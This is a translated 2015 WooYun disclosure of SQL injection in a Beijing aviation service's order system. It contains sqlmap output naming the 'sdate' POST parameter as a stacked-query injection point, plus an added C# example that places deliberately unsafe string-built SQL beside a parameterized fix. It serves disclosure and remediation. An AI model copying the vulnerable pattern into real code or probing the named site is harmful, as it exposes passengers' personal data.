Haihua Aviation has two SQL injection flaws leaking a large volume of order data (names, phone numbers, ID numbers, flight numbers, departure times, etc.)

Vulnerability Summary

Defect ID: WooYun-2015-0120629

Vulnerability title: Haihua Aviation has two SQL injection flaws leaking a large volume of order data (names, phone numbers, ID numbers, flight numbers, departure times, etc.)

Affected vendor: Beijing Haihua Aviation Service Co., Ltd.

Author: missy

Submitted: 2015-06-17 15:25

Published: 2015-09-17 17:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Tags:

Vulnerability Details

Disclosure status:

2015-06-17: Details sent to the vendor; awaiting vendor handling
2015-06-19: Vendor has confirmed; details disclosed to the vendor only
2015-06-22: Details opened to third-party security partners (NSFOCUS, 唐朝安全巡航, 无声信息)
2015-08-13: Details disclosed to core white hats and experts in the relevant field
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public

Brief description:

SQL injection; UNION queries are supported.

Details:

POST injection:

Second location:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUFZGthZGpkZAIFDw8WAh8ABQwwMTAtNTE2NjIzNTVkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFrg88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvZ2p0aWNrZXRzLmFzcHgiPsK3IOWbvemZheacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvSG90ZWwvIj7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1RyYWluLyI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXmn6Xor6I8L2E+PGkgY2xhc3M9ImljbzA0Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL09yZGVyL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9SZXR1cm4uYXNweCI+wrcg6YCA56Wo6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9zY2dxX2xpc3QuYXNweCI+wrcg5Y2H6Iix5pS55pyf6K6w5b2VPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXlrqHmoLg8L2E+PGkgY2xhc3M9ImljbzA1Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0NoZWNrL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7lt67ml4XmiqXooag8L2E+PGkgY2xhc3M9ImljbzA2Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL1JlcG9ydC9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdmlzYS5hc3B4Ij7CtyDnrb7or4E8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ieC5hc3B4Ij7CtyDkv53pmak8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9vdGhlci5hc3B4Ij7CtyDlhbblroM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPui0ouWKoeeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDciPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL2Zrc3FfbWViLmFzcHgiPsK3IOS7mOasvueUs+ivt+iusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3BheV9oaXN0b3J5LmFzcHgiPsK3IOW3suS7mOasvuiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL29yZGVyc19hbGwuYXNweCI+wrcg57u85ZCI57uf6K6hPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwveGNkX29yZGVycy5hc3B4Ij7CtyDooYznqIvljZXkuqTmjqU8L2E+PC9saT48L3VsPjwvbGk+ZAILDxYCHgtfIUl0ZW1Db3VudGZkAg0PZBYGAgEPDxYCHwAFX0NvcHlyaWdodCAmY29weTsgMjAxNCBoaGNsLmgtaC5jb20uY24gYWxsIHJpZ2h0cyByZXNlcnZlZC4g5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAUx5Zyw5Z2A77ya5YyX5Lqs5biC5Lic5Z+O5Yy65a6J5b636Lev55SyMTDlj7c1LTEwNWRkAgUPDxYCHwAFK+eUteivne+8mjAxMC01MTY2MjM1NSDkvKDnnJ/vvJowMTAtNTE2Njg0NTBkZGQ4DgfmxxdQd1D4B9sSChUIuH8jnZxCNN1XTiLowCZMtA==&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A

Proof of vulnerability:

Remediation:

Filter (validate) the input.
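The injection point sqlmap reported is the POST parameter sdate, executed against Microsoft SQL Server by what the ViewState in the request shows to be an ASP.NET WebForms application. The suggested fix, filtering, is only robust when the filtered value is also bound as a typed parameter rather than concatenated into the SQL text, since a single quote followed by a semicolon in a concatenated string is exactly what lets a second (stacked) statement run. The following C# is an added example and is not code from the original report or from the vendor's site: the parameter name sdate comes from the report, while the table and column names, the date format and the method names are assumptions.

```csharp
// Added example (not from the original report). Assumes an ASP.NET WebForms page
// that searches flight orders by a departure date posted as "sdate" (the parameter
// name sqlmap flagged). Table and column names are hypothetical.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

public static class OrderQuery
{
    // VULNERABLE: the posted value is spliced straight into the SQL text, so any
    // quote or statement separator in it becomes part of the query. This is the
    // pattern that makes the "stacked queries" finding above possible.
    public static DataTable SearchOrdersUnsafe(SqlConnection conn, string sdate)
    {
        string sql = "SELECT order_no, passenger_name, flight_no, depart_time " +
                     "FROM orders WHERE depart_date = '" + sdate + "'";
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // HARDENED: validate the shape of the value first (the "filtering" the report
    // recommends), then bind it as a typed DATE parameter. SQL Server receives a
    // date value, never SQL text, so the input cannot alter the statement.
    public static DataTable SearchOrdersSafe(SqlConnection conn, string sdate)
    {
        if (!DateTime.TryParseExact(sdate, "yyyy-MM-dd", CultureInfo.InvariantCulture,
                                    DateTimeStyles.None, out DateTime departDate))
        {
            // Reject anything that is not a plain calendar date; log the rejection
            // server-side, but do not echo the raw value back to the client.
            throw new ArgumentException("sdate must be a date in yyyy-MM-dd form");
        }

        const string sql = "SELECT order_no, passenger_name, flight_no, depart_time " +
                           "FROM orders WHERE depart_date = @sdate";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@sdate", SqlDbType.Date).Value = departDate;
            using (var adapter = new SqlDataAdapter(cmd))
            {
                var table = new DataTable();
                adapter.Fill(table);
                return table;
            }
        }
    }
}
```

The validation step limits the accepted input to a calendar date, and the parameter binding guarantees that even an input which slips past validation is treated as data. Applying the same two changes to the other injection point the report counts (the first location is not shown on this page) closes both findings; running the application's database account with read-only rights on the order tables further limits what any remaining injection could reach.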

Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-06-19 17:19

Vendor reply:

CNVD has confirmed and reproduced the described situation and has forwarded it via CNCERT to the civil aviation industry assessment center, which will coordinate handling with the website's administering unit.

Latest status:

None yet

Comments

  1. 2010-01-01 00:00 疯狗 (White hat | Rank: 22 | Vulnerabilities: 2)

    Airline ticket scams have been making a bit of a comeback lately.